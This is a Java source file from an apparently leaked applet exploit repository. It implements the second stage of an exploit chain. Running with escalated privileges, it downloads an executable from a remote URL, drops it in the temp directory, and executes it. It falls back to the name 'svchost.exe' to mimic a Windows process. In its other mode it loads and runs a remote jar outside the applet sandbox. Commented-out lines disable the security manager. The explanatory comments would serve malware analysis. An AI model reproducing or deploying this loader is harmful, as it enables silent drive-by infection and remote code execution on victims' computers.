hackedteam/vector-applet

twostage/src-exploit/x/PayloadRunnerOrig.java

package x;

import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLConnection;
import java.security.AccessController;
import java.security.PrivilegedAction;

/**
 * Second-stage payload runner of the applet exploit chain.
 *
 * Construction alone triggers execution: the constructor hands {@code this}
 * to {@link AccessController#doPrivileged}, so {@link #run()} executes with
 * the caller's (by then elevated) privileges. All inputs arrive through the
 * public static fields below, which are populated by an earlier stage that is
 * not part of this file.
 *
 * Two delivery modes are implemented in {@link #run()}:
 * <ul>
 *   <li>binary mode ({@code pBin != null}): download a native executable into
 *       the JVM temp directory and start it via {@link Runtime#exec(String[])};</li>
 *   <li>jar mode (otherwise): create a {@link URLClassLoader} reflectively from
 *       {@link #clClazz}, load {@code pClass} from {@code pJar} and call its
 *       static {@code main(String[])}.</li>
 * </ul>
 *
 * Forensic artifacts left on disk in binary mode (see {@link #run()}):
 * an empty {@code temp*.bin} file created only to locate the temp directory
 * and never deleted, plus the dropped executable named after the URL path,
 * or {@code svchost.exe}, or a random {@code *.exe} name as fallbacks.
 */
public class PayloadRunnerOrig implements PrivilegedAction<Void> {

    // Base URL of the hosting page, or the literal "demomode" for local testing.
    public static String docBase = null;
    // Jar URL (absolute, or relative to docBase) used in jar mode.
    public static String pJar = null;
    // Fully-qualified class whose static main(String[]) is invoked in jar mode.
    public static String pClass = null;
    // Arguments passed to the executable (binary mode) or to main() (jar mode).
    public static String[] pArgs = null;
    // Executable URL (absolute, or relative to docBase); non-null selects binary mode.
    public static String pBin = null;

    // Class used to construct the URLClassLoader in jar mode. Never assigned in
    // this file; presumably set by the first stage, which would make it a
    // loader obtained outside the applet sandbox -- confirm against the caller.
    public static Class<?> clClazz;
    
    /**
     * Runs {@link #run()} immediately inside a privileged action; there is no
     * separate start method.
     */
    public PayloadRunnerOrig() {
        AccessController.doPrivileged(this);
    }

    /**
     * Downloads and executes the payload selected by the static fields.
     *
     * @return always {@code null}; success or failure is not reported to the
     *         caller -- every exception is caught and printed to stderr.
     */
    @SuppressWarnings("all")
    @Override
    public Void run() {
//        if( pJar == null ) {
//            // Default handler
//            try {
//                System.setSecurityManager(null);
////                System.out.println("HAXOORD! SECURITY DISABLED!");
//            } catch( Exception e ) {
////                System.out.println("Failed! Security still enabled.");
//            }
//            return null;
//        } 
            
        // Load payload privileged and execute main function.
        try {
            // Local test mode: resolve relative payload paths against
            // <user.dir>/html/ instead of a remote document base.
            if( "demomode".equals(docBase) ) {
                docBase = "file:/"+System.getProperty("user.dir").replace('\\', '/')+"/html/index.html";
            }
            // Strip the page name so docBase ends with the directory "/".
            // NOTE: throws NullPointerException if docBase was never set;
            // that is swallowed by the catch below.
            docBase = docBase.substring(0,docBase.lastIndexOf("/")+1);
            URL url = null;
            boolean binaryPayload = pBin != null;
            String payloadLoc = binaryPayload ? pBin 
                                              : pJar;
            // A leading scheme ("http:", "file:", ...) marks an absolute URL;
            // anything else is taken relative to docBase.
            if( payloadLoc.matches("[a-z]+:.*") ) {
                url = new URL(payloadLoc);
            } else {
                url = new URL(docBase+payloadLoc);
            }    
//            System.out.println(url);
            byte[] bytes = new byte[16384];
            if( binaryPayload ) {
                URLConnection con = url.openConnection();
                InputStream in = con.getInputStream();
                int bytesRead;                
                File downloadLoc = null;
                // createTempFile is used only to discover the temp directory.
                // The empty "temp*.bin" file it creates is never deleted.
                File f = File.createTempFile("temp", ".bin");
                File tempDir = f.getParentFile();
                // Drop name = last path segment of the URL, query string removed.
                String filename = payloadLoc.substring(payloadLoc.lastIndexOf('/')+1);
                if( filename.contains("?") ) {
                    filename = filename.substring(0,filename.indexOf("?"));
                }
                if( filename.length() != 0 ) {
                    if( !filename.endsWith(".exe") ) {
                        filename = filename+".exe";
                    }
                    downloadLoc = new File(tempDir+"/"+filename);
                    // If a previous drop exists and cannot be removed (e.g. still
                    // running), fall back to a name that mimics a Windows system
                    // process, then to a random temp name.
                    if( downloadLoc.exists() && !downloadLoc.delete() ) {
                        downloadLoc = new File(tempDir+"/svchost.exe");
                        if( downloadLoc.exists() && !downloadLoc.delete() ) {
                            downloadLoc = File.createTempFile("", ".exe");
                        }
                    }
                }
                // NOTE: when the URL path ends in "/" (empty filename) downloadLoc
                // is still null here and this constructor throws NPE, which is
                // caught below; the open InputStream is then never closed.
                FileOutputStream fout = new FileOutputStream(downloadLoc);
                while( (bytesRead = in.read(bytes)) != -1 ) {
                    fout.write(bytes, 0, bytesRead);
                }
                // Streams are closed only on the success path; any exception in
                // the copy loop leaks both handles (no finally).
                in.close();
                fout.close();
                // argv[0] = absolute path of the dropped file, followed by pArgs.
                // Array form of exec: no shell, so pArgs are passed verbatim.
                String[] command = new String[pArgs.length+1];
                command[0] = downloadLoc.getAbsolutePath();
                System.arraycopy(pArgs, 0, command, 1, pArgs.length);
                Runtime.getRuntime().exec(command);
            } else {

                // Build the class loader via reflection on clClazz rather than
                // `new URLClassLoader(...)`; parent is null (bootstrap loader),
                // so the payload jar is not delegated through the applet loader.
                URLClassLoader cl = (URLClassLoader) clClazz.
                        getConstructor(new Class[] { URL[].class, ClassLoader.class }).
                        newInstance(new URL[] { url },null);
                
                // Invoke the payload's static main(String[]) with pArgs.
                Class c = cl.loadClass(pClass);
                Method m = c.getMethod("main", new Class[] { String[].class });
                m.invoke(null, (Object)pArgs);
            }    
            //System.out.println("Payload executed!");
        } catch (Exception e) {
//            System.out.println("Failed! Could not load payload.");
            // Best-effort: failures are only printed to stderr, never rethrown,
            // so the caller cannot distinguish success from failure.
            e.printStackTrace();
        } 
        return null;
    }

}